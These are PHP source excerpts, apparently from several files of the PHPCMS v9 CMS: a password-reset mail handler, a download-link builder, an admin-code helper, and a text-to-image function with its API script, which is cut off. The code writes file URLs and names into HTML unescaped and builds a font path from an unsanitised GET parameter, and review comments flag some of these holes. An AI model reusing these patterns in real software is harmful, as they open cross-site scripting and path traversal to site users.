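        if (!empty($memberinfo['email'])) {
            $email = $memberinfo['email'];
        } else {
            showmessage(L('email_error'), HTTP_REFERER);
        }

        pc_base::load_sys_func('mail');
        $phpcms_auth_key = md5(pc_base::load_config('system', 'auth_key') . $this->http_user_agent);
        $code = sys_auth($memberinfo['userid'] . "\t" . SYS_TIME, 'ENCODE', $phpcms_auth_key);
        $url = APP_PATH . "index.php?m=member&c=index&a=public_forget_password&code={$code}";
        $message = $member_setting['forgetpassword'];
        $message = str_replace(array('{click}', '{url}'), array('<a href="' . $url . '">' . L('please_click') . '</a>', $url), $message);

        // Resolve the site name used as the mail sender name.
        $sitelist = getcache('sitelist', 'commons');
        if (isset($sitelist[$memberinfo['siteid']]['name'])) {
            $sitename = $sitelist[$memberinfo['siteid']]['name'];
        } else {
            $sitename = 'PHPCMS_V9_MAIL';
        }

        sendmail($email, L('forgetpassword'), $message, '', '', $sitename);
        showmessage(L('operation_success'), 'index.php?m=member&c=index&a=login');
    } else {
        $siteid = isset($_REQUEST['siteid']) && trim($_REQUEST['siteid']) ? intval($_REQUEST['siteid']) : 1;
        $siteinfo = siteinfo($siteid);
        include template('member', 'forget_password_mobile');
    }
}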
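/**
 * Build the HTML download links for a multi-file field.
 *
 * When the field setting 'downloadlink' is truthy each link points at the
 * content/down controller with an encoded a_k token; otherwise the stored
 * file URL is linked directly.
 *
 * @param string $field Field name, used to look up the field setting
 * @param mixed  $value Stored field value, converted with string2array()
 * @return array List of <a> elements as strings
 */
function downfiles($field, $value)
{
    // Read only the two settings that are used instead of extract()-ing the
    // whole setting array into local scope, where a key named like a local
    // ('value', 'field', ...) would overwrite it.
    $setting = string2array($this->fields[$field]['setting']);
    $downloadlink = is_array($setting) && isset($setting['downloadlink']) ? $setting['downloadlink'] : null;
    $downloadtype = is_array($setting) && isset($setting['downloadtype']) ? $setting['downloadtype'] : null;

    $list_str = array();
    $file_list = string2array($value);
    if (!is_array($file_list)) {
        return $list_str;
    }

    foreach ($file_list as $_k => $_v) {
        // Array keys are quoted: bare fileurl/filename are undefined constants.
        if (empty($_v['fileurl'])) {
            continue;
        }
        $filename = !empty($_v['filename']) ? $_v['filename'] : L('click_to_down');

        // NOTE(review): fileurl and filename are placed into HTML without
        // escaping here - confirm they are sanitised before they are stored.
        if ($downloadlink) {
            $a_k = urlencode(sys_auth("i={$this->id}&s=&m=1&f={$_v['fileurl']}&d={$downloadtype}&modelid={$this->modelid}&catid={$this->catid}", 'ENCODE', pc_base::load_config('system', 'auth_key')));
            $list_str[] = "<a href='" . APP_PATH . "index.php?m=content&c=down&a_k={$a_k}' target='_blank'>{$filename}</a>";
        } else {
            $list_str[] = "<a href='{$_v['fileurl']}' target='_blank'>{$filename}</a>";
        }
    }

    return $list_str;
}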
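/**
 * Build the encoded admin-management code.
 *
 * The plain text is "adminuser_<pc_hash>_<unix time>", encoded with a key
 * derived from the system auth_key and the literal 'adminuser'.
 *
 * @return string Encoded code
 */
private function get_admin_manage_code()
{
    $pc_auth_key = md5(pc_base::load_config('system', 'auth_key') . 'adminuser');

    // The key is quoted: a bare pc_hash is an undefined constant.
    $pc_hash = isset($_GET['pc_hash']) ? $_GET['pc_hash'] : '';

    return sys_auth("adminuser_" . $pc_hash . "_" . time(), 'ENCODE', $pc_auth_key);
}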
/**
 * Turn a text into an <img> tag that renders it as an image.
 *
 * Returns false for an empty text. When imagepng() is not available the text
 * is returned unchanged; otherwise the text is encoded with sys_auth() and
 * passed to api.php?op=creatimg together with the rendering options.
 *
 * NOTE(review): $fonttype, $fontsize, $font, $fontcolor and $transparent are
 * concatenated into the URL and the HTML attribute without encoding, so
 * callers are expected to pass trusted values - confirm at the call sites.
 *
 * @param string $txt         Text to render
 * @param int    $fonttype    Built-in font size when no external font is used, 1-5
 * @param int    $fontsize    Font size when an external font is used
 * @param string $font        Font file name; fonts live under phpcms\libs\data\font
 * @param string $fontcolor   Font colour as hex, e.g. FFFFFF, FF0000
 * @param string $transparent Passed through as the 'transparent' query parameter
 * @return mixed false, the original text, or the <img> markup
 */
function string2img($txt, $fonttype = 5, $fontsize = 16, $font = '', $fontcolor = 'FF0000', $transparent = '1')
{
    if (empty($txt)) {
        return false;
    }

    // Without imagepng() the text is handed back untouched.
    if (!function_exists("imagepng")) {
        return $txt;
    }

    $token = urlencode(sys_auth($txt));
    $query = 'op=creatimg&txt=' . $token
        . '&fonttype=' . $fonttype
        . '&fontsize=' . $fontsize
        . '&font=' . $font
        . '&fontcolor=' . $fontcolor
        . '&transparent=' . $transparent;

    return '<img src="' . APP_PATH . 'api.php?' . $query . '" align="absmiddle">';
}
<?php defined('IN_PHPCMS') or exit('No permission resources.'); $txt = trim($_GET['txt']); if (extension_loaded('gd') && $txt) { header("Content-type: image/png"); $txt = urldecode(sys_auth($txt, 'DECODE')); $fontsize = isset($_GET['fontsize']) ? intval($_GET['fontsize']) : 16; $fontpath = PC_PATH . 'libs' . DIRECTORY_SEPARATOR . 'data' . DIRECTORY_SEPARATOR . 'font' . DIRECTORY_SEPARATOR; $fontfile = isset($_GET['font']) && !empty($_GET['font']) ? $fontpath . trim($_GET['font']) : $fontpath . 'georgia.ttf'; $fontcolor = isset($_GET['fontcolor']) && !empty($_GET['fontcolor']) ? trim($_GET['fontcolor']) : 'FF0000'; $fontcolor_r = hexdec(substr($fontcolor, 0, 2)); $fontcolor_g = hexdec(substr($fontcolor, 2, 2)); $fontcolor_b = hexdec(substr($fontcolor, 4, 2)); if (file_exists($fontfile)) { //计算文本写入后的宽度,右下角 X 位置-左下角 X 位置 $image_info = imagettfbbox($fontsize, 0, $fontfile, $txt); $imageX = $image_info[2] - $image_info[0] + 10; $imageY = $image_info[1] - $image_info[7] + 5; //print_r($image_info); $im = @imagecreatetruecolor($imageX, $imageY) or die("Cannot Initialize new GD image stream"); $white = imagecolorallocate($im, 255, 255, 255); $font_color = imagecolorallocate($im, $fontcolor_r, $fontcolor_g, $fontcolor_b); imagecolortransparent($im, $white); //背景透明 imagefilledrectangle($im, 0, 0, $imageX, $imageY, $white); $txt = iconv(CHARSET, "UTF-8", $txt); imagettftext($im, $fontsize, 0, 5, $imageY - 5, $font_color, $fontfile, $txt); } else { $imageX = strlen($txt) * 9; $im = @imagecreate($imageX, 16) or die("Cannot Initialize new GD image stream");